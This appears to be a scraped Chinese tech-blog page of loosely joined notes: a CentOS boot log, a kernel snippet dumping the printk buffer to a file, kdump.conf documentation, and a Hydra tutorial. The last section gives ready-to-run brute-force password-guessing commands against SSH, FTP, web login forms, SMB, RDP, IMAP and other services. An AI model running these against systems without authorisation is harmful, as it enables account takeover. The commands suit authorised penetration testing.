kk Blog —— 通用基础

mount -o remount,rw  /

e2fsck 1.38 (30-Jun-2005)
fsck.ext3: while determining whether /dev/sda2 is mounted.
/: recovering journal
/: clean, 100877/4653056 files, 1236284/4648809 blocks
Mounting root filesystem.
Trying mount -t ext4 /dev/sda2 /sysroot
Trying mount -t ext3 /dev/sda2 /sysroot
Using ext3 on root filesystem
Switching to new root and running init.
^MINIT: version 2.86 booting^M
	        Welcome to  CentOS release 5.8 (Final)
	        Press 'I' to enter interactive startup.
Cannot access the Hardware Clock via any known method.
Use the --debug option to see the details of our search for an access method.
Setting clock  (utc): Tue Aug  5 19:18:49 PDT 2014 [  OK  ]^M
Starting udev: [  OK  ]^M

char **log_buf;
int *log_buf_len, *log_start, *log_end;

int MASK;
int end, len;
unsigned i, j, limit, count;
char c;
int ret;


log_buf = (char**) 0xffffffff803270e0;
log_buf_len = (int*)0xffffffff803270d8;
log_start = (int*) 0xffffffff804eabd0;
log_end = (int*) 0xffffffff804eabe0;

i = 0;
end = *log_end;
len = *log_buf_len;
MASK = len - 1;

count = L;
if (count > len) count = len;
limit = end;

for (i=0;i<count;i++) {
        j = limit-1-i;
        c = *(*log_buf + (j&MASK));
        if (c == '\0') c = '\n';
        buf[count-1-i] = c;
}

// 输出

file = filp_open(file_path, O_RDWR|O_CREAT|O_APPEND, 0777);
if(IS_ERR(file)) {
        printk("Open file %s failed..\n", file_path);
        return 0;
}
old_fs = get_fs();
set_fs(get_ds());
ret = file->f_op->write(file, buf, i, &file->f_pos);
file->f_op->fsync(file, file->f_dentry, 0);
set_fs(old_fs);
filp_close(file, NULL);

# Configures where to put the kdump /proc/vmcore files
#
# This file contains a series of commands to perform (in order) when a
# kernel crash has happened and the kdump kernel has been loaded.  Directives in
# this file are only applicable to the kdump initramfs, and have no effect if
# the root filesystem is mounted and the normal init scripts are processed
#
# Currently only one dump target and path may be configured at a time. If dump
# to configured dump target fails, the default action will be preformed.
# Default action may be configured with the "default" directive below.
#
# Basics commands supported are:
# path <path>           - Append path to the filesystem device which you are
#                         dumping to.  Ignored for raw device dumps.
#                         If unset, will default to /var/crash.
#
# core_collector <command> <options>
#                       - This allows you to specify the command to copy the
#                         vmcore.  You could use the dump filtering program
#                         makedumpfile, the default one, to retrieve your core,
#                         which on some arches can drastically reduce core file
#                         size. See /usr/sbin/makedumpfile --help for a list of
#                         options. Note that the -i and -g options are not
#                         needed here, as the initrd will automatically be
#                         populated with a config file appropriate for the
#                         running kernel.
#                         For ssh dump, scp should be used instead of cp.
#
# raw <partition>       - Will write /proc/vmcore into raw <partition>.
#
# nfs <nfs mount>       - Will mount fs and copy /proc/vmcore to
#                         <mnt>/<path>/%HOST-%DATE/, supports DNS.
#
# nfs4 <nfs mount>      - Will use NFSv4 instead of NFSv3
#
# net <nfs mount>       - This is a deprecated option to transfer vmcore over
#                         nfs.  Use "nfs" option instead.
#
# ssh <user@server>     - Will copy /proc/vmcore to
#                         <user@server>:<path>/%HOST-%DATE/ via SSH,
#                         supports DNS. If makedumpfile is the core_collector,
#                         it is piped to an "ssh" shell, otherwise use the
#                         specified core_collector like scp.
#                         NOTE: make sure user has necessary write
#                         permissions on server
#
# net <user@server>     - This is a deprecated option to transfer vmcore over
#                         ssh.  Use "ssh" option instead.
#
# <fs type> <partition> - Will mount -t <fs type> <partition> /mnt and copy
#                         /proc/vmcore to /mnt/<path>/127.0.0.1-%DATE/.
#                         NOTE: <partition> can be a device node, label or uuid.
#
# disk_timeout <seconds>
#                       - Number of seconds to wait for disks to appear prior
#                         to continue to save dump. By default kdump waits
#                         180 seconds for the disks to show up it needs. This
#                         can be useful in some cases if disk never shows up
#                         (Either because disk was removed or because kdump is
#                         waiting on wrong disk).
#
# link_delay <seconds>
#                       - Some network cards take a long time to initialize, and
#                         some spanning tree enabled networks do not transmit
#                         user traffic for long periods after a link state
#                         changes.  This optional parameter defines a wait
#                         period after a link is activated in which the
#                         initramfs will wait before attempting to transmit
#                         user data.
#
# kdump_post <binary | script>
#                       - This directive allows you to run a specified
#                         executable just after the memory dump process
#                         terminates. The exit status from the dump process
#                         is fed to the kdump_post executable, which can be
#                         used to trigger different actions for success or
#                         failure.
#
# kdump_pre <binary | script>
#                       - works just like the kdump_post directive, but instead
#                         of running after the dump process, runs immediately
#                         before.  Exit status of this binary is interpreted
#                         as follows:
#                         0 - continue with dump process as usual
#                         non 0 - reboot/halt the system
#
# extra_bins <binaries | shell scripts>
#                       - This directive allows you to specify additional
#                         binaries or shell scripts you'd like to include in
#                         your kdump initrd. Generally only useful in
#                         conjunction with a kdump_post binary or script that
#                         relies on other binaries or scripts.
#
# extra_modules <module(s)>
#                       - This directive allows you to specify extra kernel
#                         modules that you want to be loaded in the kdump
#                         initrd, typically used to set up access to
#                         non-boot-path dump targets that might otherwise
#                         not be accessible in the kdump environment. Multiple
#                         modules can be listed, separated by a space, and any
#                         dependent modules will automatically be included.
#                         Module name should be specified without ".ko" suffix.
#
# options <module> <option list>
#                       - This directive allows you to specify options to apply
#                         to modules in the initramfs.  This directive overrides
#                         options specified in /etc/modprobe.conf. Module name
#                         should be specified without ".ko" suffix.
#
# blacklist <module|directory>
#                       - Prevents modules from being loaded in the initframfs,
#                         either directly during auto-created insmod calls or as
#                         a dependency of another module load. A specific module
#                         or a directory can be specified. In the latter case,
#                         all modules found below the specified directory will
#                         be excluded. This directive can be specified multiple
#                         times or as a space separated list. Module name should
#                         be specified without ".ko" suffix.
#
# sshkey <path>
#                       - Specifies the path of the ssh identity file you want
#                         to use when doing ssh dump. It must be a private key,
#                         the default value is /root/.ssh/kdump_id_rsa. When
#                         progagating public key, the key is assumed to be
#                         identity_file.pub which by default is
#                         /root/.ssh/kdump_id_rsa.pub.
#
# default <reboot | halt | poweroff | shell | mount_root_run_init>
#                       - Action to preform in case dumping to intended target
#                         fails. If no default action is specified, "reboot"
#                         is assumed default.
#
#                         reboot: If the default action is reboot simply reboot
#                                 the system and loose the core that you are
#                                 trying to retrieve.
#                         halt:   If the default action is halt, then simply
#                                 halt the system after attempting to capture
#                                 a vmcore, regardless of success or failure.
#                         poweroff: The system will be powered down
#                         shell:  If the default action is shell, then drop to
#                                 an hush session inside the initramfs from
#                                 where you can try to record the core manually.
#                                 Exiting this shell reboots the system.
#            mount_root_run_init: Mount root filesystem and run init. Kdump
#                                   initscript will try to save dump to root
#                                   filesystem in /var/crash dir. This will
#                                   likely require a lot more memory to
#                                   be reserved for kdump kernel.
#
# debug_mem_level <0-3>
#                       - Turns on debug/verbose output of kdump scripts
#                         regarding free/used memory at various points of
#                         execution. Higher level means more debugging output.
#                         0 - no output
#                         1 - partial /proc/meminfo
#                         2 - /proc/meminfo
#                         3 - /proc/meminfo + /proc/slabinfo
#
# force_rebuild <0 | 1>
#                       - By default, kdump initrd only will be rebuilt when
#                         necessary. Specify 1 here to force rebuilding kdump
#                         initrd every time when kdump service starts.

sudo apt-get install libssl-dev libssh-dev libidn11-dev libpcre3-dev libgtk2.0-dev libmysqlclient-dev libpq-dev libsvn-dev firebird2.1-dev libncp-dev hydra

yum install openssl-devel pcre-devel ncpfs-devel postgresql-devel libssh-devel subversion-devel

# tar zxvf hydra-7.0-src.tar.gz
# cd hydra-7.0-src
# ./configure
# make
# make install

hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e ns]
[-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-f] [-s PORT] [-S] [-vV] server service [OPT]
-R 继续从上一次进度接着破解。
-S 采用SSL链接。
-s PORT 可通过这个参数指定非默认端口。
-l LOGIN 指定破解的用户，对特定用户破解。
-L FILE 指定用户名字典。
-p PASS 小写，指定密码破解，少用，一般是采用密码字典。
-P FILE 大写，指定密码字典。
-e ns 可选选项，n：空密码试探，s：使用指定用户和密码试探。
-C FILE 使用冒号分割格式，例如“登录名:密码”来代替-L/-P参数。
-M FILE 指定目标列表文件一行一条。
-o FILE 指定结果输出文件。
-f 在使用-M参数以后，找到第一对登录名或者密码的时候中止破解。
-t TASKS 同时运行的线程数，默认为16。
-w TIME 设置最大超时的时间，单位秒，默认是30s。
-v / -V 显示详细过程。

1、破解ssh：
hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns ip ssh
hydra -l 用户名 -p 密码字典 -t 线程 -o save.log -vV ip ssh

2、破解ftp：
hydra ip ftp -l 用户名 -P 密码字典 -t 线程(默认16) -vV
hydra ip ftp -l 用户名 -P 密码字典 -e ns -vV

3、get方式提交，破解web登录：
hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns ip http-get /admin/
hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns -f ip http-get /admin/index.php

4、post方式提交，破解web登录：
hydra -l 用户名 -P 密码字典 -s 80 ip http-post-form "/admin/login.php:username=^USER^&password=^PASS^&submit=login:sorry password"


hydra -t 3 -l admin -P pass.txt -o out.txt -f 10.36.16.18 http-post-form "login.php:id=^USER^&passwd=^PASS^:<title>wrong username or password</title>"

（参数说明：-t同时线程数3，-l用户名是admin，字典pass.txt，保存为out.txt，
-f 当破解了一个密码就停止， 10.36.16.18目标ip，
http-post-form表示破解是采用http的post方式提交的表单密码破解,
<title>中 的内容是表示错误猜解的返回信息提示。）

5、破解https：
hydra -m /index.php -l muts -P pass.txt 10.36.16.18 https

6、破解teamspeak：
hydra -l 用户名 -P 密码字典 -s 端口号 -vV ip teamspeak

7、破解cisco：
hydra -P pass.txt 10.36.16.18 cisco
hydra -m cloud -P pass.txt 10.36.16.18 cisco-enable

8、破解smb：
hydra -l administrator -P pass.txt 10.36.16.18 smb

9、破解pop3：
hydra -l muts -P pass.txt my.pop3.mail pop3

10、破解rdp：
hydra ip rdp -l administrator -P pass.txt -V

11、破解http-proxy：
hydra -l admin -P pass.txt http-proxy://10.36.16.18

12、破解imap：
hydra -L user.txt -p secret 10.36.16.18 imap PLAIN
hydra -C defaults.txt -6 imap://[fe80::2c:31ff:fe12:ac11]:143/PLAIN